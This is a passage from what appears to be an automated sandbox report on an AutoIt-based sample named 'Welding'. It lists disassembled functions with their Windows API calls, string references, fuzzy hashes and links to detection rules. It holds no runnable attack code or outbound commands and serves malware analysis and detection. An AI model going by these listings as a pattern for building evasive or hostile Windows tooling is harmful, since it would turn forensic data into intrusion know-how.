SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0010AA6F
GetWindowThreadProcessId.USER32(?,00000000), ref: 0010AA82
GetCurrentThreadId.KERNEL32 ref: 0010AA89
AttachThreadInput.USER32(00000000), ref: 0010AA90

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: f3ffa0143b6caa34006f65bb7f35215d4cff0b451ad7c75be08cf3b3e8ed520b
Instruction ID: c86b32bcc0d4502cd536e4263d70a52d570515f64edc501d2b7c51043d214462
Opcode Fuzzy Hash: f3ffa0143b6caa34006f65bb7f35215d4cff0b451ad7c75be08cf3b3e8ed520b
Instruction Fuzzy Hash: A0E03035641328B6DB225FA29D0CEDB3F1CEF167A1F408011FA0A854A0C7B18590CBA0

Function 000B25F4 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 000B260D
SetTextColor.GDI32(?,000000FF), ref: 000B2617
SetBkMode.GDI32(?,00000001), ref: 000B262C
GetStockObject.GDI32(00000005), ref: 000B2634
GetWindowDC.USER32(?,00000000), ref: 000EC1C4
GetPixel.GDI32(00000000,00000000,00000000), ref: 000EC1D1
GetPixel.GDI32(00000000,?,00000000), ref: 000EC1EA
GetPixel.GDI32(00000000,00000000,?), ref: 000EC203
GetPixel.GDI32(00000000,?,?), ref: 000EC223
ReleaseDC.USER32(?,00000000), ref: 000EC22E

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 9c5b023d2983f095cd794065ed1ea2aebc36c5defe9ef39f649752694407615f
Instruction ID: e73d7bbe9d792eb0c7e384693f8a30f0348a8f64471e73685bdfc8b3ec919a23
Opcode Fuzzy Hash: 9c5b023d2983f095cd794065ed1ea2aebc36c5defe9ef39f649752694407615f
Instruction Fuzzy Hash: CCE06535504284BFEB625F65AC09BD83B51EB0A731F04836AFB79580F1877245C0DB11

Function 00109330 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00109339
OpenThreadToken.ADVAPI32(00000000,?,?,?,00108F04), ref: 00109340
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00108F04), ref: 0010934D
OpenProcessToken.ADVAPI32(00000000,?,?,?,00108F04), ref: 00109354

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 5002f61b74c8d941cdc59c8620787fd698d8f7af3cb98a092cbda6e70c2464e4
Instruction ID: 3e5cf9240a6db4760c6a8e843d944a179e5ab8fee617cf75cdb83d02d86d16fe
Opcode Fuzzy Hash: 5002f61b74c8d941cdc59c8620787fd698d8f7af3cb98a092cbda6e70c2464e4
Instruction Fuzzy Hash: B1E04F3A6012119FD7211FB25D0DB573BACBF5A791F108818B785CA0E0E6749484CB50

Function 000F0679 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 000F0679
GetDC.USER32(00000000), ref: 000F0683
GetDeviceCaps.GDI32(00000000,0000000C), ref: 000F06A3
ReleaseDC.USER32(?), ref: 000F06C4

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: fa84b9dff6e195aff39eb0ba55de8bd45a0489444808e053c38ac916000d5df7
Instruction ID: f15b338c96f8f6b1ca58b7268fbde04c619b233e0bd7d09df5856ffaffc77ee2
Opcode Fuzzy Hash: fa84b9dff6e195aff39eb0ba55de8bd45a0489444808e053c38ac916000d5df7
Instruction Fuzzy Hash: 10E01A79800204EFCB129F61D808BAD7BF1EF8C350F128419FE5AE7621CB3885919F50

Function 000F068D Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 000F068D
GetDC.USER32(00000000), ref: 000F0697
GetDeviceCaps.GDI32(00000000,0000000C), ref: 000F06A3
ReleaseDC.USER32(?), ref: 000F06C4

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: e84468953516f9d43972fd06fc803617380de596e0f97c555f130ae4eafc868b
Instruction ID: f5d851f844ae1d192730b1047417afbebef7257757af822c2ed89eb38747fc9b
Opcode Fuzzy Hash: e84468953516f9d43972fd06fc803617380de596e0f97c555f130ae4eafc868b
Instruction Fuzzy Hash: 55E01A79800204AFCB129F61D808A9D7BF1EF8C350F128418FE5AA7620CB3895918F50

Function 000C278A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 000C49C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,000C27AF,?,00000001), ref: 000C49F4

_free.LIBCMT ref: 000FFB04
_free.LIBCMT ref: 000FFB4B

Part of subcall function 000C29BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 000C2ADF

Strings

Bad directive syntax error, xrefs: 000FFB33

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: Bad directive syntax error
API String ID: 2861923089-2118420937
Opcode ID: 4a9bfdc0e2e523957a901d7a788fc16a714502a4c1b8bfe1b7bdc62e3db228ae
Instruction ID: 95bc19183ae9ed83b9badd2256c262b01c6c14252d87633b792626deee124215
Opcode Fuzzy Hash: 4a9bfdc0e2e523957a901d7a788fc16a714502a4c1b8bfe1b7bdc62e3db228ae
Instruction Fuzzy Hash: 66919D7191421EAFCF14EFA4C891AFDB7B4FF19310F10442AF916AB6A2DB709A05DB50

Function 0010BE8C Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 0010C057

Strings

AutoIt3GUI, xrefs: 0010BFCF
Container, xrefs: 0010BFD4

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: 89c91dea909952c81c206bac4f8f307cb35c67fa32bf701a318df5dc9ee9c092
Instruction ID: 24b8ad7a7b2b3366b333114bd10dcb3ced635769dc1124d76a199bbf0ba78bbc
Opcode Fuzzy Hash: 89c91dea909952c81c206bac4f8f307cb35c67fa32bf701a318df5dc9ee9c092
Instruction Fuzzy Hash: BF913874604202EFDB14DF64C884A6AB7E5FF49710F20856EF94ADB6A1DBB1E841CF90

Function 0011B5EF Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 000C436A: _wcscpy.LIBCMT ref: 000C438D

Part of subcall function 000B4D37: __itow.LIBCMT ref: 000B4D62
Part of subcall function 000B4D37: __swprintf.LIBCMT ref: 000B4DAC

__wcsnicmp.LIBCMT ref: 0011B670
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0011B739

Strings

LPT, xrefs: 0011B66A

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: 633113bc92e86a09c9f588c3da817f468d84eb2f0451bbe6b670cb24494796dc
Instruction ID: 9a47d56d7b4ee144386316e76bbf1798dfd7c1b7f6e24ebdf13913708d68f183
Opcode Fuzzy Hash: 633113bc92e86a09c9f588c3da817f468d84eb2f0451bbe6b670cb24494796dc
Instruction Fuzzy Hash: DA615E75A04215AFCB18DF94C891EEEB7B5EB48310F158069F546AB3D1D770AE80CB51

Function 000BE00D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 000BE01E
GlobalMemoryStatusEx.KERNEL32(?), ref: 000BE037

Strings

@, xrefs: 000BE02B

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 4a57d28b4e8fa51fb5e23fdcf9524404654a4f53b732c189c34767e56c83ee1a
Instruction ID: b6fc976b793eb1db73a421cb1e149758dad5ff53a8402f6b48fea42c1403d407
Opcode Fuzzy Hash: 4a57d28b4e8fa51fb5e23fdcf9524404654a4f53b732c189c34767e56c83ee1a
Instruction Fuzzy Hash: 1A514971418B449BE320AF50E885BEFB7F8FB84715F41485DF2D8411A2DB709669CB16

Function 00119CF1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 000C4AB2: __fread_nolock.LIBCMT ref: 000C4AD0

_wcscmp.LIBCMT ref: 00119DE1
_wcscmp.LIBCMT ref: 00119DF4

Strings

FILE, xrefs: 00119D2D

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: c7587e3ca246f2a6561b4f2ecf7e02aab92304b99b2543b6cbe96699de900c67
Instruction ID: 9a33689fc69c81c4efc85baaec569fd114238380eb719ea78f07fa79ec37885f
Opcode Fuzzy Hash: c7587e3ca246f2a6561b4f2ecf7e02aab92304b99b2543b6cbe96699de900c67
Instruction Fuzzy Hash: EB41E572A40209BADF249BA4CC55FEF77BDEF45710F00047AF910A7281D77199448B65

Function 000BAD96 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 000BADE1
OleUninitialize.OLE32(?,00000000), ref: 000BAE80
UnregisterHotKey.USER32(?), ref: 000BAFD7
DestroyWindow.USER32(?), ref: 000F2F64
FreeLibrary.KERNEL32(?), ref: 000F2FC9
VirtualFree.KERNEL32(?,00000000,00008000), ref: 000F2FF6

Strings

close all, xrefs: 000BADDC

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 8c4444c48035c12bfd24fc19f38f8fb514a5481d8ece70854b23688130497f36
Instruction ID: 6e62cace3cfaad8c27c38fab48696b25dd19e6ed9caae34b55ae14b674a4bf34
Opcode Fuzzy Hash: 8c4444c48035c12bfd24fc19f38f8fb514a5481d8ece70854b23688130497f36
Instruction Fuzzy Hash: 205148703012168FC719EF15C5A5BA9F7A5FF14704F5082AEE50AA3652DF30AE1ACF50

Function 00138096 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00138186
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0013819B

Strings

', xrefs: 001380EF

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: de99bb9d15944758e8234f3a6e5ffb79235b6a743fbcef0eb21481d7ecb6a08d
Instruction ID: fa71a092963505c248fbc434aae89fd9731f6c71f7ac8dd247856d4afe5dd65b
Opcode Fuzzy Hash: de99bb9d15944758e8234f3a6e5ffb79235b6a743fbcef0eb21481d7ecb6a08d
Instruction Fuzzy Hash: 64410874A013099FDB14CF64C881BDABBB5FF09340F14016AF909AB391DB71A956CFA0

Function 00122C5A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00122C6A
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00122CA0

Strings

|, xrefs: 00122C71

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 349bda228e357fec141ea547afc9a54e8389d3abcb106d5d2e86a8b4d8306315
Instruction ID: 28d7343a0a8637fc4b120e928221e7115494bd7cf2e57e6119ecce53944fd78c
Opcode Fuzzy Hash: 349bda228e357fec141ea547afc9a54e8389d3abcb106d5d2e86a8b4d8306315
Instruction Fuzzy Hash: 1B312871C00219ABCF11EFA0DC85EEEBFB9FF09304F100019F915A6262EB315A56DBA0

Function 00137088 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 0013713C
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00137178

Strings

static, xrefs: 001370D8

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: ee37496bfd15216345d26ad171b2ac667eac5b24e6311c011b157ae25a38cee2
Instruction ID: 10a157a232230ddb27a8da6601437834c4806cbe646e30067fa938804558eb28
Opcode Fuzzy Hash: ee37496bfd15216345d26ad171b2ac667eac5b24e6311c011b157ae25a38cee2
Instruction Fuzzy Hash: 2831AFB2100604AEDB25DF78CC80AFB73B9FF49720F109619FAA597191DB30AC91DB60

Function 00113049 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 001130B8
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 001130F3

Strings

0, xrefs: 001130B1

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: f044fb1cdfa35a0cd6d04af8821f324f6189569d4b82b018d47f6c1a7af58aa5
Instruction ID: 800c5b987a7135ca17b300f04defd49394a6489f9acaa7e9cd4bf5794b3b69f6
Opcode Fuzzy Hash: f044fb1cdfa35a0cd6d04af8821f324f6189569d4b82b018d47f6c1a7af58aa5
Instruction Fuzzy Hash: EF31D231A00305FBEB289F58C885BEEBBB9FF05350F144039E9A5A61A5D7709BC4CB51

Function 001240B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00124132

Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77

Strings

AUTOITCALLVARIABLE%d, xrefs: 00124124
, $, xrefs: 00124172

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 3506404897-2584243854
Opcode ID: bb491a7fa4521a3bb3a454e7529bd578ce6714fca720398335a01ac4c03e0c3f
Instruction ID: 62042fc0fbf920bf2e63fc4188481dc52334c1ffe6c50427f161b129c70a71ec
Opcode Fuzzy Hash: bb491a7fa4521a3bb3a454e7529bd578ce6714fca720398335a01ac4c03e0c3f
Instruction Fuzzy Hash: B8219571A00228ABCF14EFA4DC91FED77B5EF59340F440458F905A7242DB70E965CBA1

Function 00136CF9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00136D86
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00136D91

Strings

Combobox, xrefs: 00136D53

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: d63526f788488b699245f635150c38ca945bbb6de25765e4220023e54bee1ee0
Instruction ID: 88e3c49498d8aeadba831bb3990ab2607b1ee6a2f8e0373c9f26b201898256a2
Opcode Fuzzy Hash: d63526f788488b699245f635150c38ca945bbb6de25765e4220023e54bee1ee0
Instruction Fuzzy Hash: 561186713102087FEF159E94DC81EFB3B6AEB943A4F118125F9589B290D771DC518760

Function 0013722C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 000B2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 000B214F
Part of subcall function 000B2111: GetStockObject.GDI32(00000011), ref: 000B2163
